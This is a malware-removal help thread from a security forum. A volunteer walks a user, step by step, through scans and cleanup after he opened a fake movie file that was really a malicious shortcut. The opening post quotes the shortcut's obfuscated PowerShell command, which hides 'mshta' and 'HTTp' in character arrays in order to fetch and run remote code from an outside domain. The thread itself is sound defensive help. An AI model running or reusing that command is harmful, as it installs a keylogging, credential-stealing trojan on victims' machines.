Topdogmsn Posted June 14, 2020 ID:1387921 Share Posted June 14, 2020 I downloaded a movie, the file was about 1.7 gb, but when I clicked it, I immediately saw that it was a shortcut to something else. The file size went from 1.7 gb to about 2 kb. A pop-up window appeared, which I closed instantly. This line of code was in the shortcut: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $a1=[string][char[]]@(0x48,0x54,0x54,0x70) -replace ' ','';$da=[string][char[]]@(0x6d,0x73,0x68,0x74,0x61) -replace ' ','';Set-Alias uy $da;$a1+='://shortwww.xyz/hit';uy $a1 I have done some research, where people say it's a Trojan that logs keystrokes and credentials. So far im scanning with malware bytes, which removed some regedits to something called diagnostic task, but I'm not sure if that fixed it. Is this something I can save or do I need to reinstall windows? Best case would be to get some software that can detect and remove it. I did find a restore point to the day before it happened, and as I can see, the Trojan changes the registry, and system restore, restores the registry, so am I safe or? Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 15, 2020 ID:1387958 Share Posted June 15, 2020 Hi, My name is Maurice. I will be helping and guiding you, going forward on this case. Let me know what first name you prefer to go by. We cannot know a thing about this situation .....until we get history data from Malwarebytes plus reports from this pc. So collecting a report is the first necessary step. Please follow my directions as we go along. Please do not do any changes on your own without first checking with me. If you will be away for more than 3 consecutive days, do try to let me know ahead of time, as much as possible. Please only just attach all report files, etc that I ask for as we go along. I would appreciate getting some key details from this machine in order to help you forward. NOTE: The tools and the information obtained is safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system. Do have patience while the report tool runs. It may take several minutes. Just let it run & take its time. You may want to close your other open windows so that there is a clear field of view.Download Malwarebytes Support Tool Once the file is downloaded, open your Downloads folder/location of the downloaded file Double-click mb-support-1.6.1.784.exe to run the report You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent. Place a checkmark next to Accept License Agreement and click Next Now click the left-hand side pane "I do not have an open support ticket" You will be presented with a page stating, "Get Started!" Do NOT use the button “Start repair” ! But look instead at the far-left options list in black. Click the Advanced tab on the left column Click the Gather Logs button A progress bar will appear and the program will proceed with getting logs from your computer. Please do have patience. It takes several minutes to gather. Upon completion, click a file named mbst-grab-results.zip will be saved to your Desktop. Click OK Please attach the ZIP file in your next reply. Please know I help here as a volunteer. and that I am not on 24 x 7. Help on this forum is one to one. Again, please be sure to ONLY attach report files with your reply (s) as we go along. Do not do a copy / paste into main body. Thank you, Sincerely. Link to post Share on other sites More sharing options...
Topdogmsn Posted June 15, 2020 Author ID:1387971 Share Posted June 15, 2020 Thank you very much. My name is Mikkel. I have attached the file you asked for mbst-grab-results.zip Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 15, 2020 ID:1388048 Share Posted June 15, 2020 Hello Mikkel. Thanks for the report file. What follows is an initial mini-cleanup. This custom script is for Topdogmsn only / for this machine only. Close and save any open work files before starting this procedure. I am sending a new custom Fix script which is going to be used by the FRSTENGLISH tool. They will both work together as a pair. Please RIGHT-click the (attached file named) FIXLIST and select SAVE link AS and save it directly ( as is) to the Downloads folder The tool named FRSTENGLISH.exe tool is already on the Downloads folder Start the Windows Explorer and then, to the Downloads folder. RIGHT click on FRSTENGLISH and select RUN as Administrator and allow it to proceed. Reply YES when prompted to allow to run. to run the tool. If the tool warns you the version is outdated, please download and run the updated version. IF Windows prompts you about running this, select YES to allow it to proceed. IF you get a block message from Windows about this tool...... click line More info information on that screen and click button Run anyway on next screen. on the FRSTENGLISH window: Click the Fix button just once, and wait. PLEASE have lots and lots of patience when this starts. You will see a green progress bar start. Lots of patience. This run here should be fairly quick. If you receive a message that a reboot is required, please make sure you allow it to restart normally. The tool will complete its run after restart. When finished, the tool will make a log ( Fixlog.txt) in the same location from where it was run. Please attach the FIXLOG.txt with your next reply later, at your next opportunity Please do have patience. We will do more later. Fixlist.txt Link to post Share on other sites More sharing options...
Topdogmsn Posted June 15, 2020 Author ID:1388099 Share Posted June 15, 2020 Thank you again very much for your assistance. I have attached the Fixlog Fixlog.txt Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 15, 2020 ID:1388149 Share Posted June 15, 2020 That is a good run. Thanks for the log report. You did fine. Next, a couple of scans to check the system. The first will run rather quickly. The second may take an hour or two or so. [ 1 ] The Microsoft Safety Scanner is a free Microsoft stand-alone virus scanner that can be used to scan for & remove malware or potentially unwanted software from a system. The download links & the how-to-run-the tool are at this link at Microsoft https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download Let me know the result of this. The log is named MSERT.log the log will be at %SYSTEMROOT%\debug\msert.log which in most cases is C:\Windows\debug\msert.log Please attach that log with your reply, when you get the chance. No rush. You can do that at the very end. [ 2 ] I suggest you start this at some point when you do not need the use of the system. And that you Close as many opened apps as you can , plus, also Close as many browsers as you can before starting this. I would suggest that you do a scan with a scan tool from ESET to just only scan the C drive. I would suggest a free scan with the ESET Online Scanner Go to https://www.eset.com/us/home/online-scanner/ Look on the right side of the page. Click Scan Now It will start a download of "esetonlinescanner_enu.exe" Save the file to your system, such as the Downloads folder, or else to the Desktop. Go to the saved file, and double click it to get it started. When presented with the initial ESET options, click on "Computer Scan". Next, when prompted by Windows, allow it to start by clicking Yes When prompted for scan type, Click on Custom scan ( the choice on far-right side) We want just the C drive to be scanned. In the display "Select custom scan targets" keep the top 3 lines ticked, plus the one for the C drive ( which should be your Windows drive) UN-tick the other drives ( D, E, F, etc...) Then click on the blue button "Save and continue" Select the radio selection "Enable ESET to detect and quarantine potentially unwanted applications" and click on Start scan button. Have patience. The entire process may take an hour or more. There is an initial update download. There is a progress window display. You should ignore all prompts to get the ESET antivirus software program. ( e.g. their standard program). You do not need to buy or get or install anything else. When the scan is completed, if something was found, it will show a screen with the number of detected items. If so, click the button marked “View detected results”. Click The blue “Save scan log” to save the log. Look for it on the bottom left, in blue. If something was removed and you know it is a false finding, you may click on the blue ”Restore cleaned files” ( in blue, at bottom). Press Continue when all done. You should click to off the offer for “periodic scanning”. The goal here is to see if there are suspicious or actual threats on the C drive. Link to post Share on other sites More sharing options...
Topdogmsn Posted June 15, 2020 Author ID:1388164 Share Posted June 15, 2020 Is it a quick or a full scan you want me to do with the Microsoft Safety Scanner? Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 15, 2020 ID:1388170 Share Posted June 15, 2020 A quick scan. Link to post Share on other sites More sharing options...
Topdogmsn Posted June 15, 2020 Author ID:1388177 Share Posted June 15, 2020 Here you go eset.txt msert.log Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 15, 2020 ID:1388190 Share Posted June 15, 2020 The Safety scanner found 2 files of malware & has removed those. The ESET Online scanner reported no malware. I would suggest to download, Save, and then run Malwarebytes ADWCLEANER. Please close Chrome and all other open web browsers after you have saved the Adwcleaner and before you start Adwcleaner scan. Adwcleaner detects factory Preinstalled applications too! Please download Malwarebytes AdwCleaner https://downloads.malwarebytes.com/file/adwcleaner Be sure to Save the file first, to your system. Saving to the Downloads folder should be the default on your system. Go to the folder where you saved Adwcleaner. Double click Adwcleaner to start it. At the prompt for license agreement, review and then click on I agree. You will then see a main screen for Adwcleaner. ( if you do not see it right away, minimized the other open windows, so you can see Adwcleaner). Then click on Dashboard button. Click the blue button "Scan Now". allow it a few minutes to finish the Scan. Let it remove what it finds. NOTE: When it comes to the section " Pre-installed applications You can skip that. Please find and send the Adwcleaner "C" clean report. In Adwcleaner, click the "Reports" button. Look at the list of reports for the latest date & type "Clean". Double Click that line & it will open in Notepad. Save the file to your system and then Attach that with your reply. That C clean report will be the one with the most recent Date and time at folder C:\AdwCleaner\Logs Thanks. Keep me advised. Link to post Share on other sites More sharing options...
Topdogmsn Posted June 16, 2020 Author ID:1388291 Share Posted June 16, 2020 Here it is AdwCleaner[C00].txt Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 16, 2020 ID:1388303 Share Posted June 16, 2020 Thank you for the Adwcleaner report. Thus far, we have not seen the 'shortcut' or some reference to 'powershell'. How are things at this point on the computer system ? Did you do a scan today with Malwarebytes for Windows ? What follows is meant as a one=time run. Run a scan with Malwarebytes. Start Malwarebytes from the Windows Start menu. Click Settings ( gear icon) at the top right of Malwarebytes window. We want to see the SETTINGS window. Then click the SECURITY tab. Scroll down and lets be sure the line in SCAN OPTIONs for "Scan for rootkits" is ON Click it to get it ON if it does not show a blue-color Now click the small X to get back to the main menu window. Click the SCAN button. Select a Threat Scan ( which should be the default). When the scan phase is done, be real sure you Review and have all detected lines items check-marked on each line on the left. That too is very critical. Then click on Quarantine selected. Be sure all items were removed. Let it remove what it has detected ( if anything.). Then, locate the Scan run report; export out a copy; & then attach in with your reply. See https://support.malwarebytes.com/hc/en-us/articles/360038479194-View-Reports-and-History-in-Malwarebytes-for-Windows-v4 Sincerely, Link to post Share on other sites More sharing options...
Topdogmsn Posted June 16, 2020 Author ID:1388316 Share Posted June 16, 2020 Hi there. The shortcut file was located on my F drive, but i deleted it after i clicked it. I did restore my PC to the day before i clicked it, so im hoping it would undo what changes the malware did to my registry I have attached the log from malwarebytes threatscan.txt Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 16, 2020 ID:1388324 Share Posted June 16, 2020 Thanks for that scan report from Malwarebytes. There is no active malicious malware. Thanks for the reminder that you did delete the shortcut & that that was on the F drive. You could, if you are inclined, scan the F drive using the Windows Defender antivirus. This next suggested procedure will run Windows defender on the F drive. The Windows defender can be run from a elevated Command prompt. Just remember this here is customized for F drive. On the Windows taskbar , on the Windows search box, type in cmd.exe and then look at the entire list of choices, and click on Run as Administrator. It is best to use COPY & Paste for the following. At the Command prompt either type or copy/paste the following commands, tap Enter-key after the command: "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -file f:\ then tap the Enter-key to get that going. You will see this as initial on-screen display Scan starting ... Have patience during the run. Wait for this display Scan finished. Then look for the bottom line result. Jot that down for your records. When all done, you can Close the command-prompt window. Let me know if you need other help. Link to post Share on other sites More sharing options...
Topdogmsn Posted June 16, 2020 Author ID:1388337 Share Posted June 16, 2020 CMD is saying: C:\WINDOWS\system32>"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -file f:\ CmdTool: Failed with hr = 0x80004005. Check C:\Users\Stanley\AppData\Local\Temp\MpCmdRun.log for more information MpCmdRun.log Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 16, 2020 ID:1388438 Share Posted June 16, 2020 Thank you for the log. Unfortunately, it is a very very brief summary that does not have much detail. However, it seems to me that it did not flag any actual 'malware'. We can do a visual look-see. From the Start menu, select Settings, then select Update and Security. Next, look at the left-side menu & select Windows Security Next, In Windows Security section: Click on the grey button Open Windows Security . Now, click on the shield Virus and threat protection By the way, when you see a green check-mark on your display, it means a good status and that protection is on. Look for the line marked "Protection History" and click that line. We want to look for the detail of today's last Scan run. Link to post Share on other sites More sharing options...
Topdogmsn Posted June 17, 2020 Author ID:1388495 Share Posted June 17, 2020 There were no history in Virus Protection. I did manage to do a custom scan of the F drive and it reported no threats Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 17, 2020 ID:1388543 Share Posted June 17, 2020 Thank you for the information, plus the screen grab. This result is very good. At this point, a different tool to scan the pc for viruses & other malware ( if any ). Do not click on the small popup mini-window that shows up. Look for the green color button that says "Download Dr.Web CureIt" with the down-arrow icon Download Dr.Web CureIt to the desktop. The download is nearly 208 MB in size After the download is completed, then close the browser and all other web browsers too. Use the Windows File Explorer to go to the Downloads folder. doubleclick on the download file file to start the tool. ( drweb will randomize the name of the file when you download it ) ⦁ You will see a screen similar to this: Click the checkbox to participate, and then click on Continue button. ⦁ Next Click on Select objects for scanning ⦁ Next Put a checkmark by clicking on all the boxes EXCEPT for "Temporary files" "System restore points" Do not select Temporary files or System Restore points. Then click on Start scanning button ⦁ The scan in progress will be shown like this ⦁ IF something is detected, you will see a screen similar to this For each item "detected", click on the Action column down arrow, like this Your options will be Cure or Ignore IF you see an item that you are very sure is ok, then un-check the checkbox for that item. Typically, you will keep the Cure default. Then click on the Neutralize button. ⦁ When the actions are completed, you will see this ⦁ Click on the green Open Report line. It will pop-up the report in NOTEPAD. Save the report to your desktop. The report will be called Cureit.log ⦁ Close Dr.Web Cureit. ⦁ Reboot your computer to allow files that were in use to be moved/deleted during reboot. ⦁ After reboot, attach the log Cureit.log you saved previously in your next reply. Have patience in all this. Link to post Share on other sites More sharing options...
Topdogmsn Posted June 17, 2020 Author ID:1388603 Share Posted June 17, 2020 No threats found cureit.log Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 17, 2020 ID:1388612 Share Posted June 17, 2020 Allright ! That is very good. I believe this system is good to go. SecurityCheck by glax24 I would like you to run a tool named SecurityCheck to inquire on the current-security-update status of some applications. Download SecurityCheck by glax24 from here and save the tool on the desktop. If Windows's SmartScreen block that with a message-window, then Click on the MORE INFO spot and over-ride that and allow it to proceed. This tool is safe. Smartscreen is overly sensitive. Right-click with your mouse on the Securitycheck.exe and select "Run as administrator" and reply YES to allow to run & go forward Wait for the scan to finish. It will open in a text file named SecurityType.txt. Close the file. Attach it with your next reply. You can find this file in a folder called SecurityCheck, C:\SecurityCheck\SecurityCheck.txt Link to post Share on other sites More sharing options...
Topdogmsn Posted June 18, 2020 Author ID:1388747 Share Posted June 18, 2020 SecurityCheck.txt Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 18, 2020 ID:1388878 Share Posted June 18, 2020 Thanks for the report. You want to check about updates for 2 of the apps on this machine. K-Lite Codec Pack 3.2.0 Full v.3.20 Warning! Download Update WinRAR 5.50 (64-bit) v.5.50.0 Warning! Download Update We can wrap up this case. What follows is a cleanup on the tools used. To remove the FRST tool & its work files, do this. Go to your Downloads folder. Do a RIGHT-click on FRSTENGLISH.exe & select RENAME & then change it to UNINSTALL.exe . Then run that ( double click on it) to begin the cleanup process. Delete SecurityCheck.exe Delete msert.exe Delete the ESET download esetonlinescanner_enu.exe Delete the DrWeb CureIt download file Delete the mb-support-1.6.1.784.exe Delete the mbst-grab-results.zip on the Desktop , Backup is your best friend. Keep backups of your system on a regular basis to offline storage & keep those safe. https://forums.malwarebytes.com/topic/136226-backup-software/ It is not enough to just have a security program installed. Each pc user needs to practice daily safe computer and internet use. Best practices & malware prevention: Follow best practices when browsing the Internet, especially on opening links coming from untrusted sources. First rule of internet safety: slow down & think before you "click". Never click links without first hovering your mouse over the link and seeing if it is going to an odd address ( one that does not fit or is odd looking or has typos). Free games & free programs are like "candy". We do not accept them from "strangers". Never open attachments that come with unexpected ( out of the blue ) email no matter how enticing. Never open attachments from the email itself. Do not double click in the email. Always Save first and then scan with antivirus program. Pay close attention when installing 3rd-party programs. It is important that you pay attention to the license agreements and installation screens when installing anything off of the Internet. If an installation screen offers you Custom or Advanced installation options, it is a good idea to select these as they will typically disclose what other 3rd party software will also be installed. Take great care in every stage of the process and every offer screen, and make sure you know what it is you're agreeing to before you click "Next". Use a Standard user account rather than an administrator-rights account when "surfing" the web. See more info on Corrine's SecurityGarden Blog http://securitygarden.blogspot.com/p/blog-page_7.html Dont remove your current login. Just use the new Standard-user-level one for everyday use while on the internet. Do a Windows Update. Make certain that Automatic Updates is enabled.https://support.microsoft.com/en-us/help/12373/windows-update-faq Keep your system and programs up to date. Several programs release security updates on a regular basis to patch vulnerabilities. Keeping your software patched up prevents attackers from being able to exploit them to drop malware. For other added tips, read "10 easy ways to prevent malware infection" Stay safe. I wish you all the best. 😎 Sincerely, Maurice Link to post Share on other sites More sharing options...
Maurice Naggar Posted June 18, 2020 ID:1388879 Share Posted June 18, 2020 Glad we could help. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request. This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread. Please review the following for Tips to help protect from infection Thank you Link to post Share on other sites More sharing options...
Recommended Posts